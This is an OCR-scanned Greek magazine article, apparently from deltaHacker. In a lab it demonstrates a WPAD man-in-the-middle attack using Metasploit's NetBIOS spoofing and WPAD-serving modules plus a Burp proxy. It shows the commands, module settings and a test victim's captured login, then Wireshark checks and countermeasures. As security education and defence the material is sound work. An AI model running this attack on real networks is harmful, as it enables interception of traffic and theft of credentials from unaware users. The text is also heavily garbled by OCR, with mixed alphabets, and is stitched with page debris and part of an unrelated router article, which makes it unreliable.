virtual machines. Στο ёха εγκατέστησα Windows 7 και εἰχε τη διεύθυνση 
192.168.137.177. Στο ἄλλο pópro- mg 
σα ro BackTrack 5 R2 και εἶχε τη 
διεύθυνση 192.168.137.252. Про- 
фамас, то прото ММ θα nače то 
ρόλο rou θύματος, ενώ то δεύτε- 
po θα εἶχε το роЛо του επιτιθἐµε- 
νου. Αυτὸ που χρειαζόμαστε απὀ 
το BackTrack εἶναι δύο modules 
TOU Metasploit (ἑνα για το NetBIOS 
spoofing κι ἑνα yia то σερβἰρισµα 
του wpad.dat), καθὼς και το Burp 
Suite (intercepting proxy). Πριν 
στήσουμε την παγίδα, δηµιουρ- 
уфутас том ὑπουλο proxy server, 
πρέπει να κάνουμε µια πλήρη evn- 
µέρωση rou BackTrack: 


Terminal 


has you 


root@bt:~# apt-get update 
Κι αµέσως µετά... 


root(bt:-4 apt-get upgrade 


Εικόνα 2 

О eniriO£ue- 

νος έτρεξε то 
Metasploit και το 
framework τον 
καλωσόρισε µε ἑνα 
апо та ομορφό- 
repa banner тои 
(follow the whiter 
rabbit)! Επίσης, 
φαίνεται От! TO 
Metasploit έχει 
ενημερωθεί και 
αναβαθμιστεί στην 
εκδοχή 15700. 

τη στιγµή που 
γράφονται αυτὲς Οἱ 
γραμμὲς, πρὀκει- 
ται για την πλέον 
πρόσφατη ἐκδοση 
rou Metasploit... 


Eikóva 3 

Οι απαραίτητες 
ρυθμίσεις για τον 
proxy server του 
burp suite... 
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x burp suite free edition v1.4.01 
burp intruder repeater window about 
| target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options 


To add a new listener, complete the relevant details and click "add". 


local listener port: 


on loopback interface only 


О support invisible pro -aware clients 


redirect to host: 


redirect to port: 


server SSL certificate: 


О use а self-signed certificate 


(& generate CA-signed per-host certificates. 


О generate а CA-signed certificate with a specific hostname: 


Ὁ use a custom certificate (PKCS12): 


file select 


password 


Στην περίπτωση nou ἐχετε εγκαταστήσει ro Metasploit σε κἀποια ἄλλη 
διανομή, φροντίστε να αναβαθμίσετε τουλάχιστον то ἰδιο то framework. 
Па να πετύχετε κάτι τέτοιο EKTEAÉOTE το ακόλουθο: 

root(bt:-4 msfupdate 
Έτσι, θα ξεκινήσει η διαδικασία αναβάθµισης rou Metasploit, oro τέλος 
της οποίας θα έχετε φτάσει στο πιο πρόσφατο revision... 

[*] 

[*] Attempting to update the Metasploit Framework... 

[*] 


Updated to revision 15700. 


Παρεμπιπτόντως, το παραπάνω βήμα μπορούν να κάνουν κι όσοι έχουν 
BackTrack αλλά βαριούνται να амаВавнісоум ολόκληρο ro σύστημα. Πριν 
προχωρήσουμε στο πείραμα καθαυτὀ, πρέπει να φροντίσουμε кайт! ακόμα. 
To σερβἰρισµα του wpad.dat θα πραγματοποιείται апо éva ειδικὀ module 
του Metasploit. Επομένως, прёп να κλείσουμε rov Apache web server 
(τρέχει εξ ορισμού στο BackTrack), oore να µην υπάρξει κάποιο conflict: 


root@bt:~# service apache2 stop 

* Stopping web server apache2 ... waiting . [ OK ] 
Όσοι χρησιμοποιούν κάποια ἄλλη διανομὴ, πρέπει επἰσης va κλείσουν том 
Apache -- й οποιονδήποτε ἆλλο web server ενδέχεται να εἶναι ενεργός. 
Στήσιμο της пауібас 


Μετά την απαραίτητη προετοιμασία, μπορούμε να ξεκινήσουμε TO 
Metasploit: 
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він CES ΕΒ 
іо im тис η” πα: Θ- 


Μια απλή κίνηση. 
Н μήπως όχι; 


Επιχείρηση SwitchBlade: To καρφώνεις και τελειώνι 
praeto |2170: й 


Г Na ue θυμάσαι 
Animation & Collision Detection, Τότε και o 
Τώρα! 

μμ | 01/08/2012, 15414 | Published ο 


πῶς умбтом то animation mv εποχή Ίων home computers. Ti ёха αλλάξει από Αναζήτηση 


Var Via αερα.) кик их οπαµέης бок, (goncioy) & 
euer ess BAG пр WM Ud re agen 
ο нунан Буе ытыыр ы 
i НЫНЫН [νεσυνδροµη 


κνοῦμενων γραφικών! 


Εγγραφή 
Χάσατε vov κωδικό σας. 
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Ιστ TDI 


Гә = ө 


root@bt:~# msfconsole 


Και κάπως ἐτσι θα µας Χαιρετίσει ёха апо τα πανέμορφα banners του 
Metasploit (στη δικἠ µας περίπτωση εμφανίστηκε ro "follow the white 
rabbit", апо ro Matrix). Θα ενημερωθούμε yia την πρὀσφατη αναβάθμιση 
του προγράµµατος και θα εμφανιστεί п γραμμὴ ємтоЛам TOU: 


-[ Metasploit v4.4.0-release [core:4.4 api:1.0] 
+ -- ---[ 922 exploits - 495 auxiliary - 150 post 
+ -- ---[ 251 payloads - 28 encoders - 8 nops 
-[ svn r15700 updated today (2012.08.02) 


msf » 


* burp suite free edition v1.4.01 
burp intruder repeater window about 


scanner {intruder | repeater | sequencer | decoder | comparer | options | alerts 


| target | proxy | spider 
intercept 
request to http://deltahacker.gr:80 [109.74.192.50] 


options | history 


forward drop | 


raw | headers | hex | 


GET / HTTP/1.1 
Accept: image/jpeg, applicatio! 
application/x-ms-xbap, */* 
Accept-Language: el-GR 
User-Agent: Mozilla/4.0 (compatib 
.NET CLR 3.5.30729; .NET CLR 3.0.3! 
Accept-Encoding: gzip, deflate 
Proxy-Connection: Keep-Alive 
Host: deltahacker.qr 


ercept is on action 


ID 


x-ms-application, image/gif, application/xaml*xml, image/pjpeg, 


; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; 
29; Media Center PC 6.0) 


To request 
του θύματος! 


| ο matches 


Εικόνα 4 

H περιήγηση στο 
web ξεκινά εντελώς 
τυχαία, µε ἑνα login 
στο forum του 
deltahacker.gr... 


Εικόνα 5 

WPAD MiTM 
attack is alive 
and kicking! Ζητώ 
συγνώμη, алла 
όταν ξεκίνησα αυτή 
τη λεζάντα ο µε- 
ταφραστής ἀρχισε 
να βγάζει καπνούς 
και σταμάτησε va 
λειτουργεί :S 
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Eikóva 6 

О proxy server тои 
burp suite έκανε то 
θαύμα rou! Me τη 
βοἠθειἁ rou μάθα- 
µε кат TO username 
ка! TO passoword 
TOU ανυποψίαστου 
θύματος! 
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Арука, πρέπει va φορτώσουμε ro module yia то NetBIOS spoofing. Αμέ- 
σως µετά μπορούμε va δούμε тіс ρυθμίσεις του, για να ελέγξουμε av και 
ποια θα πρέπει va τροποποιήσουμε. 


msf » use auxiliary/spoof/nbns/nbns response 
msf auxiliary(nbns response) > show options 


Module options (auxiliary/spoof/nbns/nbns response): 


Name Current Setting Required Description 

INTERFACE no The name of the interface 

REGEX а yes Regex applied to the NB Name to determine 
if spoofed reply is sent 

SPOOFIP 127.0.0.1 yes IP address with which to poison responses 

TIMEOUT 500 yes The number of seconds to wait for new 
data 


Εἶναι φανερό, νομίζω, ὁτι прёп να θέσουμε στο REGEX την τιμή WPAD 
και сто SPOOFIP тп διεύθυνση rou server µας. Па σκοπὀ αυτό, εκτελού- 
µε та ακὀλουθα: 


msf  auxiliary(nbns response) > set regex WPAD 
regex -» WPAD 
msf  auxiliary(nbns response) > set spoofip 192.168.137.252 
spoofip => 192.168.137.252 
msf auxiliary(nbns_response) > run 
[*] Auxiliary module execution completed 
[*] NBNS Spoofer started. Listening for NBNS requests... 
AUTÒ ἦταν ӧЛо! Апо aurr| τη στιγμή και μετὰ, η εικονικἠ μηχανὴ µε то 


burp suite free edition v1.4.01 
burp intruder repeater window about 
target | ргоху | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 


t [ options | history |. - 


request to http://deltahacker.gr:80 [109.74.192.50] 


( raw | params | headers | hex 
POST request to /wp-admin/admin-ajax php 
name 


value 
211221888.1026436408.1343936710.1343936710.1343936710.1 
211221888.1.10.1343936710 
211221888 
211221888.1343936710.1.1.utmcsr-(direct)|utmccn-(direct)|utmcemd-(none) 
sidebar login process 


victim. 
user password icO0lPasswORd 
“теше forever 


A96 2F262Fdeltahacker.gr962F 


body encoding: applicationwww-form-urlencoded 
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BackTrack θα διαφημίζεται στο δίκτυο ως WPAD server. Σειρά ἐχει το 
ζήτημα µε το διαμοιρασμό του wpad.dat. Ката τα γνωστά, αφού ξεκινή- 
соир TO σχετικὀ module, θα ρίξουμε µια ματιὰ και στις ρυθμίσεις TOU... 


msf auxiliary(nbns response) > use auxiliary/server/wpad 
msf auxiliary(wpad) > show options 


Module options (auxiliary/server/wpad): 


Name Current Setting Required Description 

EXCLUDENETMASK 255.255.255.0 yes Netmask to exclude 

EXCLUDENETWORK 127.0.0.1 yes Network to exclude 

PROXY 0.0.0.0 yes Proxy to redirect traffic to 
PROXYPORT 8080 yes Proxy port 

SRVHOST 0.0.0.0 yes The local host to listen on. This 


must be an address on the local 
machine ог 0.0.0.0 


SRVPORT 80 yes The local port to listen on. 

SSL false no Negotiate SSL for incoming 
connections 

SSLCert no Path to a custom SSL certificate 


(default is randomly generated) 


SSLVersion SSL3 no Specify the version of SSL that 
should be used (accepted: SSL2, 
SSL3, TLS1) 


TYPE DAT yes WPAD/PAC Data File (accepted: DAT, 
PAC) 


Εδὠ πρέπει va παρατηρήσουμε την τιμή του PROXYPORT. Πρόκειται για 
TO port στο onoio θα ακούει o proxy µας, σύμφωνα µε τα λεγόμενα του 
wpad.dat. Αυτό το µἐγεθος δεν χρειάζεται να το αλλάξουμε, αλλά πρέπει 


wpad.pcap. [Wireshark 1.8.0 (SYN Rev 43431 from /trunk-1.8)] 


Ме Edit Мем Go Capture Analyze Statistics Telephony Tools Internals Нер 


висо вахедіа еә ота вів ΦΑΕΙ ΜΑ ος 8 


4 Frame 381: 84 bytes on wire (672 bits), 84 bytes captured (672 bits) on interface 0 

8 Ethernet II, Src: Vmware 54:a5:7e (00:0с:29:54:а5:7е), Dst: IPv6mcast 00:01:00:03 (33:33:00:01:00:03) 

® Internet Protocol Version 6, Src: fe80::20da:358d:6007:f6a (fe80::20da:358d:6007:f6a), Dst: ff02::1:3 (ff02::1:3) 
ж User Datagram Protocol, src Port: 59895 (59895), pst Port: llmnr (5355) 

3 Link-local multicast Name Resolution (query) 


(0000 33 33 00 01 00 03 00 Oc 29 54 a5 7e 86 dd 60 00 
11 01 fe 80 00 00 00 00 00 00 20 da 
б 6a ff 02 00 00 00 00 00 00 00 00 
(0030 00 00 00 01 00 03 e9 f7 14 eb 00 1e 30 74 34 16 
(0040 00 00 00 01 00 00 00 00 оо 00 04 77 70 61 64 00 


File: "C:\Documents and SettingslAdministratorl.. | Packets: 12137 Displayed: 24 Marked: 0 Dropped: 0 Load time: 0:00.890 


Εικόνα 7 

Me τη βοήθεια 

του κατάλλη- 

Aou φίλτρου στο 
Wireshark, κατά- 
фера να εντοπίσω 
αμέσως ra ερωτή- 
рата του θύματος 
και τις απαντήσεις 
του θύτη, µέσω 
του πρωτοκόλ- 
Aou NetBIOS. Το 
spoofing ἦταν απὀ- 
лита επιτυχημένο. 
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va ro σημειώσουμε ἡ апла va то θυμόμαστε! Αλλαγή χρειάζεται στην 
επιλογή PROXY, η onoia καθορίζει τη διεύθυνση IP του ὑπουλου proxy 
server. Προφανώς, πρέπει πάλι να δώσουμε τη διεύθυνση IP rou µηχα- 
νήματος µε то BackTrack... 


msf  auxiliary(wpad) > set proxy 192.168.137.252 

proxy -» 192.168.137.252 

msf аихі1іагу(мраа) > run 

[*] Auxiliary module running as background job 

[*] Serving wpad.dat on port 80 

[*] Using URL: http://0.0.0.0:80/wpad.dat 

[*] Local IP: http://192.168.137.252:80/wpad.dat 

[*] Server started. 
Ωραία! Ξεμπερδέψαμε και ue то wpad.dat. Τώρα μένει va ενεργοποιήσου- 
ue том intercepting proxy και ακριβὠς γι’ αυτό ξεκινάμε TO burp suite. Kå- 
ντε κλικ στο Applications, πάνω αριστερά, κι ακολουθήστε τη διαδρομή 
BackTrack > Vulnerability Assessment > Web Application Assessment > 
Web Application Proxies > burpsuite. Μόλις εμφανιστεί то παράθυρο του 
προγράμματος nnyaivoupe στην καρτέλα proxy και στην υπό-καρτέλα 
options. Από εκεἰ θα τροποποιήσουµε τις ρυθμίσεις του listener. Συγκε- 
κριμένα, πρέπει να ορίσουμε ως listening port εκεἰνο nou θα διαφημίζεται 
μέσω rou wpad.dat. Με άλλα λόγια, πρέπει να орісоциє то port που ou- 
ναντήσαμε Ліүо νωρίτερα, σαν PROXYPORT. Mači µε αυτή την επέμβαση, 
αποεπιλέγουµε και то "listen on loopback interface only", ώστε o proxy 
нас να ακούει σε όλα ra interfaces. 


Τι καταφέραμε; 


Αυτό ἠταν! Πλέον єїнастє σε θέση να παρακολουθούμε òàn την κίνηση 
του τοπικού δικτύου! Па του λόγου το αληθές, μπορούμε να κάνουμε 
μερικὲς δοκιμές anó την ἄλλη εικονικἠ μηχανὴ, που ἐχει το ρόλο του 
θύματος. Н δοκιμή nou ¿Kava εγώ ἦταν απλἠ: Anó rov Internet Explorer 
επισκἑφτηκα το http://deltahacker.gr και προσπάθησα να συνδεθὼ στο 
forum, µε username το victim και password το cOOlPasswORd. Με ro που 
ξεκίνησα, στο тєруатіко rou Metasploit εμφανίστηκε ro αἰτημα λήψης 
TOU wpad.dat... 


[*] 192.168.137.177 мраа - Request "СЕТ 


[*] 192.168.137.177 wpad - Sending WPAD config ... 


[*] 192.168.137.177 wpad - Request 'GET Mozilla/4.0 (compatible; 
MSIE 8.0; Win32; Trident/4.0) 


[*] 192.168.137.177 мраа - Sending WPAD config... 


Μπορείτε va δείτε τι επακολούθησε, στις εικὀνες µε то burp suite! To біа- 
μάντι µας κατάφερε να κλέψει τα πάντα: Tov προορισμὀ του θύματος, το 
username που χρησιμοποίησε και φυσικά то password! 


Διπλὸς ἐλεγχος 


Έχοντας ката νου τη γνωστή διαγαλαξιακἠ парошіа «ὀποιος каєї στο 
χυλὸ φυσάει και το γιαούρτι», ἡμουν αποφασισμένος να µην αφήσω Ti- 
ποτα στην τύχη. Αν кайт! πήγαινε στραβά στη δοκιμή, θα ἠθελα να ξέρω 
το γιατί. Σκοπὸς µου йтам να παρακολουθήσω τη διαδικασία σε χαμηλό 
επἰπεδο, ὡστε να ξέρω ауа паса στιγμὴ τι συνέβαινε. ТєЛіка η δοκιµἠ 
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wpad.pcapng [Wireshark 1.8.0 (SVN Rev 43431 from /trunk-1.8)] 
File Edi View Go Capture Analyze Statistics Telephony Tools Internals Нер 


зивов ахаа 4 е» ота [Ыш ааак шыт» я 


Expression.. Clear Apply Save 


618 959. 746342 192.168.137.177 192.168.137.252 НТТР 


НТТР/1.1 200 οἱ 
Content-Type: spp Mcarton/x-ns- proxy-autoconfig 
Connection: clos 

Server: Apache 

Content-Length: 247 


шешп MR аЙ ГЫКШЕГЕЧҮЫ host) 1 
/ URLs within this network are accessed directly 
p (isrnNet(host, "127.0.0.1", "255.255.255.0")) 
return "DIRECT"; 


return "РАОХУ 192.168.137.252:8080; DIRECT"; 


& Ethernet II, Src: 
5 Internet Protocol 


ж Transmission cont 


Entire conversation (490 bytes) 


Find jl Save As | Print. Jo ASCII ©) EBCDIC О Hex Dump О C Arrays ( Raw 


5 ттт 
3a 50 0 4d E 7а 69 6c 6c 61 2f 34 Agent: M 02313574 
63 6f 6d 70 61 74 69 62 6c 65 3b 20 ὃ (comp atible; 


Help Filter Out This Stream | Close ) 


Ө | вів: UG крані d Settings indministrator,.- Packets: 12137 Displayed: 10 Marked: 0 Load time: 0:00, | Profile: Default 


µου πέτυχε ує тпм πρὠτη απὀπειρα, αλλά ο μηχανισμὸς παρακολούθησης 
nou ἑστησα δεν πήγε χαμένος. Μου προσέφερε το πολυπόθητο insight, 
που πολύ αγαπάμε στον πλανήτη μου ;) 


Ката то στήσιμο του τοπικού δικτύου, µε то VMware Workstation 8, χρει- 
ἁστηκε va ξεσκονἰσω τις γνώσεις µου γύρω απὀ το networking μεταξύ 
των hosts. Κάπου εκεἰ όμως ἐπεσε και το μάτι µου σε µια αναφορά στα 
λεγόμενα "virtual network hubs", ra οποία δημιουργεί το VMware. "Mia 
στιγμὴ βρε παιδιά”, αναρωτήθηκα, “εἶδα τη λέξη hubs ἡ ra μάτια µου 
ἑκαναν астєракіа;" Στο μυαλὸ πολλών апо εμάς η λέξη "hub» συνεπά- 
γεται ελεύθερο packet sniffing! Έτσι, σκέφτηκα να χρησιμοποιήσω ἑνα 
τρίτο Virtual Machine, το οποίο θα παρακολουθούσε την κἰνηση σε όλο 
то Virtual Network Hub. Σκοπὀς µου ἦταν να κάνω packet capture σε ὀλη 
συνομιλία μεταξὺ του θύματος και του θύτη, για ма μπορώ αργότερα να 
αναλύσω τη διαδικασία. Па το σκοπό αυτό σήκωσα ἑνα virtual machine 
με Windows ΧΡ, εγκατέστησα το Wireshark και το ξεκἰνησα. 


Ὅπως ауєфера και πριν, п δοκιµἠ µου στέφθηκε µε απόλυτη επιτυχία. 
Ωστόσο, το Wireshark εἰχε δημιουργήσει ἑνα αρχείο καταγραφἠς µε όλο 
то network traffic. Δεν θα μπορούσα va το αγνοήσω, οὐτε να то anoppi- 
UO σαν кайт! το εντελώς ἀχρηστο. Έτσι, ἄρχισα ма το ψαχουλεύω, για va 
επιβεβαιώσω τουλάχιστον оса ἠξερα апо τη θεωρία. Αρχικἁ, σκέφτηκα 
va τσεκάρω την αποτελεσµατικότητα rou NetBIOS spoofing. Па το σκοπὸ 
αυτό, χρησιμοποίησα στο Wireshark ro ακόλουθο φίλτρο: 


Εικὀνα 8 
Παρατηρήστε ro 
TCP Stream µε 

τη µεταφορά του 
αρχείου wpad. 

dat. Στις πρὠτες 
γραμμὲς του wpad. 
dat αναφέρεται то 
ὀνομα του browser 
του θύματος. Еіпа- 
τε τίποτα; Το θύμα 
δεν χρησιµοποι- 
οὖσε rov Internet 
Explorer, αλλά rov 
Firefox! 
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кс ць... 


bootp.option.type eq 252 ог dns.qry.name eq wpad ог nbns 
contains 46:48:46:41:45:42:45:45 


To συγκεκριµένο φίλτρο πιάνει ὀλες τις μεθόδους proxy detection, TOE- 
кароутас ra σχετικἀ αιτήματα прос DHCP, DNS και NetBIOS. To ті ava- 
κάλυψα εφαρμόζοντας το συγκεκριµένο φίλτρο Φαίνεται στην εικόνα 
7. Ὅπως βλέπετε, ο υπολογιστής θύμα (192.168.137.177) ζήτησε апо 
το δίκτυο πληροφορίες µέσω NetBIOS, για τον υπολογιστή µε ὀνομα 
WPAD. Τότε, ἐσπευσε ма του απαντήσει το μηχάνημα µε το BackTrack 
(192.168.137.252). To NetBIOS spoofing εἰχε λειτουργήσει афоуа! Арғ- 
σως μετά, σκέφτηκα va τσεκάρω τον τρόπο διακίνησης rou wpad.dat. 
Από τη θεωρία, γνώριζα ὁτι το εν λόγω αρχείο διακινείται µέσω αιτη- 
μάτων http. Έτσι, χρησιμοποιώντας σαν φίλτρο ro http, εντὀπισα ἑνα 
αἰτημα HTTP GET για то wpad.dat. Στη συνέχεια, πραγματοποιώντας 
το λεγόμενο follow ТСР stream, εμφανίστηκε μπροστὰ µου ολόκληρη 
η συνομιλία μεταξύ rou browser του θύματος και του web server του 
BackTrack. Παρεμπιπτόντως, μαζὶ µε ro request και το αντίστοιχο reply, 
εἶδα και το περιεχόµενο του wpad.dat. Το κατάλληλα κατασκευασμένο 
wpad.dat υποδείκνυε στον browser του θύματος το біко µου proxy και 
TOV ενηµέρωνε για το σχετικὀ port (8080). Μετά апо όλα αυτά, δεν εἶχα 
µόνο τη хара της επιτυχίας αλλά κι εκείνη της βαθιάς γνώσης. Eixa γνω- 
ρἰσει το μηχανισμὀ της επίθεσης µε κάθε λεπτομέρεια! 


Κίνδυνοι και αντίµετρα 


Και κάπως ἐτσι, то worm µε то буора flame καταφέρνει να διαδίδεται 
μέσω µιας ευπάθειας που ισχύει апо το 2007! Ἦρθε λοιπὀν η фра va 
γνωρίσουμε τον αποκλειστικὀ υπεύθυνο. Nai, кала διαβάσατε. О υπεύ- 
θυνος εἶναι ємас και μόνο. Πρόκειται για την επιλογἠ Automatically detect 
settings του Internet Explorer, η onoia μάλιστα εἶναι ενεργοποιημένη εξ 
ορισμού! Σε ауто το σημείο ακούω αρκετούς апо εσάς ма δηλώνετε ava- 
κουφισμένοι, επειδἠ δεν χρησιμοποιείτε Windows ἡ, поло περισσότερο, 
γιατί αποφεύγετε τον Internet Explorer. Όσοι ανἠκετε σε αυτή την Ka- 
τηγορἱα µπορείτε δικαιωματικἁ va νιώθετε ασφαλέστεροι, алла ὀχι апо- 
Аита. Σκεφτεἰτε оті θα μπορούσε κανεὶς να αντικαταστήσει то NetBIOS 
spoofing µε ἑνα κατάλληλο DNS poisoning και να πετύχει то ἴδιο апоте- 
Acopa. Εξάλλου, ο Firefox ἡ και κἀποιος ἄλλος browser θα μπορούσε να 
ἐχει ρυθµιστεἰ ὥστε να χρησιμοποιεί то proxy discovering rou συστήμα- 
τος. Σ΄ αυτή την περίπτωση, θα ἠσασταν εξίσου εκτεθειμένοι! Σε γενικὲς 
γραμμές, πρέπει να θυμόμαστε бт! πρὀκειται για µια επίθεση man in the 
middle, η οποία εκμεταλλεύεται το μηχανισμὸ WPAD και yia την οποία 
δεν θα διαμαρτυρηθεἰ κανένα antivirus! Επίσης, ας µην ξεχνάμε Ori το 
μεγαλύτερο μερίδιο χρηστών Windows ελέγχει πολὺ σπάνια τις ρυθμίσεις 
του Internet. Τέλος, εκτὸς anó την απενεργοποἰηση της σχετικἠς επιλο- 
γής, υπάρχουν δύο ακόµα αντἰμετρα. 


ο Na δημιουργήσουμε µια καταχώριση στο αρχείο hosts, της pop- 
φὴς "127.0.0.1 wpad", ὡστε κάθε фора που ενεργοποιεἰται то auto 
discovery να ανατρἑχει στον εαυτὀ του και φυσικά να αποτυγχάνει. 


ο Ἑνας διαχειριστής δικτύου μπορεί να εφαρμόσει то ἴδιο κολπάκι KA- 
θολικἀ. Μπορεί να δημιουργήσει µια εσφαλμένη καταχώρηση στις 
ρυθμίσεις του DHCP server (option 252) και µια αντίστοιχη εγγρα- 
PÀ στις ρυθμίσεις του DNS. Έτσι, ὁταν ενεργοποιείται σε κάποιον 
browser то WPAD, η αναζήτηση θα ἐχει ασφαλἠ κατάληξη κι Ох! 
κάποιας µορφήἠς spoofing. 


КРАЮ Man-in-The-Middle Attack 


ЕЕЕ ССС ССС 


Πρόλογος avri επιλόγου 


Σωστά διαβάσατε! Εγὠ μόλις ξεκίνησα και δεν xw каша διάθεση ма 
σταματήσω, ενώ εσεὶς διαβάζετε τον πρόλογο των μελλοντικών µου ypa- 
πτὠν. Μπορεί το συγκεκριμένο арбро να τέλειωσε, алла тора nou ἐμαθα 
να χειρἰζομαι τη συσκευἠ μετάφρασης στα γἠινα δεν σκοπεύω να σταµα- 
τήσω το γράψιμο. О εξωγἠινος της διπλανἠς πόρτας ἠρθε για να μείνει 
και να μοιραστεὶ μαζί σας ὁλες τις αγαπημένες του δραστηριότητες. Εσείς 
ano τη μεριὰ σας µη διστάσετε οὐτε στιγμὴ να κάνετε ερωτήσεις, σχόλια 
και παρατηρήσεις. Hit me hard και µε κᾶθε μέσο που σας προσφέρει то 
περιοδικὀ (forum στο site, Facebook fan page, Twitter κ.λπ.). Να ξέρετε 
ότι εμεἰς --εκεὶ, στο outer space-- єінастє καλόβολοι, εντελὠς akounAe- 
ξάριστοι kai (αυτὀ δεν το μεταφράζει кала п συσκευἠ µου) διαπλανιτι- 
стєс!. Ауапаує την εποικοδοµητικἡ συζήτηση µε fellow hackers, ακόµα 
κι av αυτοί προέρχονται апо κάποιον ξένο, μακρινὸ κι εξωτικὀ πλανήτη, 
όπως η Γη. 


Greetings earthlings! 


EE 
finean ШЕ! 
à General | Security | Privacy | Content ер 
Ы) To set up an Internet connection, dick Loose | Ειδήσεις Gmail Έγγραφα Ημερολόγιο Περ 
Setup. 
Dial-up and Virtual Private Network settings — — — — ——— — 
CX Local area network Сазан 
Add [- Automatic configuration 
аку | [episc ue CHO а Exaudi ΠΩ ΜΗΚΗ 
хе tic configuration. 
Remove, | 
Choose Settings if you need to configure а proxy Settings 
server for a connection, 


ddress. 


Є Never ба| а connection, 


Є рів мітетемет а network conector is mot present [ Proxy server. 
С Always dial my; default connection го Use a proxy server for your LAN (These settings will not apply to 
current None: Set default dial-up or VPN connections). 


адгезії Pert; |80 "Advanced | 


ГГ Bypass proxy server for local addresses 


Сок | ο | 


Local Area Network (LAN) settings. - — —————————————— 
LAN Settings do not apply to dial-up connections. LAN settings 
ο το ο δν ολο Певец 


όνομα! τυχερός 


Εικόνα 9 

Ορίστε о µοναδι- 
кос υπεύθυνος για 
аитп) την ευπάθεια 
των Windows. 
Αυτή η επιλογή 
εἶναι ενεργοποιη- 
μένη εξ ορισμού σε 
όλα ra συστήµατα 
Windows και кала 
θα κάνετε va την 
απενεργοποιήσετε! 


OK Cancel Apply. | 


Προγράμματα διαφήμισης Λύσεις} 


| 


pons 
чів ge 


1. Mia παραλλαγή του δικού σας «διεθνιστές». To αντίθετο του «ратолотёс̧», τέλος πάντων, αλλά σε πλανη- 
τικἠ κλίμακα. 


bu GiannouG 


| | (Πετατρέψτε τον 
router gas σε 
У torrent dounloader! 


To νέο (νέο) µας router εἶναι 
πλέον πιο δυνατὸ апо ποτέ. 
Στο ἀρθρο rou deltaHacker 

011 που αρχίζει апо τη σελίδα 
60 μιλήσαμε για ra after 
market firmware των routers, 
αναφέραμε ric μικροδιαφορές 
μεταξύ τους κι επιλέξαμε το dd- 
wrt για το δικὀ µας. Συζητήσαμε 
για το пос βρίσκουμε µια 
ἐκδοση συμβατή µε то hardware 
που διαθέτουμε, για то πῶς 
την εγκαταθιστούμµε εὔκολα 
και τέλος, апо éva ὕψος εννέα 
περίπου χιλιομέτρων, εἴδαμε 
όλες τις νέες δυνατότητες 
και ρυθμίσεις nou µας 
προσφέρονται. Το τι μπορούμε 
να κάνουμε апо εδὼ και 
πέρα εἶναι το ενδιαφέρον της 
υπόθεσης και, σε πολύ λίγο, θα 
καταλάβουμε γιατί η αλλαγή του 
firmware στον router ἠταν £va 
anó ra καλύτερα πράγµατα nou 
κάναμε για TO τοπικὀ µας біктио. 


ҰНА@КЕК 
οσον 


ÁNNI 


Μέχρι тора δεν έχουμε δει καθόλου την πιο εξειδικευμένη πλευρά rou 
νέου firmware, το οποίο, ας µην ξεχνάμε, εἶναι µια κανονικὀτατη διανομὴ 
Linux. Oa θυμόσαστε ἴσως ὁτι στο προηγούμενο τεύχος δεν ασχοληθή- 
kape καθόλου µε την καρτέλα Services του web panel. Στην καρτέλα 
αυτἠ θα βρούμε апо FTP server μέχρι ολόκληρους VPN servers, ἐτοι- 
μους va μπουν σε λειτουργία µε ελάχιστα κλικ. Επἰσης, апо τη στιγµἠ 
που το ρουτεράκι µας ἐχει ουσιαστικά μετατραπεἰ σε ἑνα κανονικὀτατο 
Linux box, σίγουρα μπορούμε να τρέχουμε κι “εξωτερικά” προγράμματα 
о" αυτὀ. Αλλά δεν έχει поло νόημα να κάνουμε καταγραφὴ λειτουργιῶν 
και δυνατοτήτων. Αντίθετα, αποφασίσαμε να σας δείξουμε στην πράξη 
μερικὲς апо τις νέες δυνατότητες που µας προσφέρονται, μετατρέποντας 
το μικρὸ µας router σε ἑναν κανονικότατο torrent downloader. Αυτή η 
λειτουργία μᾶλλον δεν ἦταν στα σχέδια του κατασκευαστή, μολαταύτα 
κάτι µας λέει бт! θα τη βρείτε εξαιρετικἀ χρήσιμη :) O downloader θα 
ελέγχεται μέσω web panel και, φυσικά, τα κατεβασμένα αρχεία θα ra 
παίρνουμε µέσω FTP ἡ SMB. 


Ρύθμιση kai ενεργοποΐηση ProFTPd καὶ SAMBA 


To dd-wrt апо μόνο του υποστηρίζει αρκετὲς діктуакеєс υπηρεσίες. Mno- 
роон π.χ. να ενεργοποιήσουµε τοπικὀ DNS server ἡ να ζητήσουμε апо 
TOV router να δουλεύει ως OpenVPN server kai Хтаутоурома" ως client. 
Ас επικεντρωθούµε ὁμως στις δυνατότητες nou θα επιτρἐψουν στον 
router va λειτουργεἰ κι ως ἑνας ικανότατος torrent downloader. Па τη 
συνέχεια, υποθέτουμε бт! η συσκευή διαθέτει θύρα USB. 


Στην καρτέλα USB, λοιπὀν, υπάρχουν οι ρυθμίσεις για τη θύρα USB της 
συσκευἠς. (Σ.τ.Ε. риб!) Φυσικά, αν δεν χρειαζόμαστε την αντίστοιχη uno- 
στήριξη, апла επιλέγουμε ro Disable. (Σ.τ.Ε. δις.) Па то σκοπὀ µας ὁμως 
θα φροντίσουμε ώστε ма ενεργοποιήσουµε τόσο το Core USB Support, 


Ίσως éva απ΄ ra oje] x 
HIO ενδιαφέροντα gE gatekeeper (build 19342) - m Е = LS 

μενού aro dd-wrt: € > Q fi (3 19216811/РРТРазр Ὁ ΡΙ = 
Ενσωματωμένη паз!!! 


υποστήριξη VPN! аал. : 


Services 
Services | VPN USB NAS | Hotspot | SIPProxy | Му AdWetwork 


| PPTP Server 


PPTP Server OpenVPN Server/Daemon 
Additional Config: 

To push routes to dents add 'push 
"route IP mask gateway", to push 
DNSAWINS add 'push "dhep-option DNS 
PPTP Client (or WINS) IP" to the config. 


PPTP Server © Enable (9 Disable 


PPTP Client OpenVPN Client 
PPTP Client Options ) ә Року ласа ноде: 

Р тше = шн Add IPS/NETs in the form 0.0.0.0/0 to 
force cients NOT to use the tunnel as 
default gateway. One line per IP/NET. 

OpenVPN Server/Daemon Redirect Gateway MUST be on. 
IP Address/Ne mask: 
OpenVPN Server/Daemon Must be set when using DHCP-Proxy 
mode and local TAP is NOT bridged 
OpenVPN Server ) Enable (9) Disable 


| OpenVPN Client 


OpenVPN Client 


Start OpenVPN Client D Enable (9 Disable 


EE зни сен | 
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Μετατρέψτε τον router σας σε torrent downloader! 
Αα 


| wf gatekeeper (build 19342) - 


€ С fi [)192168.11/NAS.asp 
ые сыы - — μα z = 


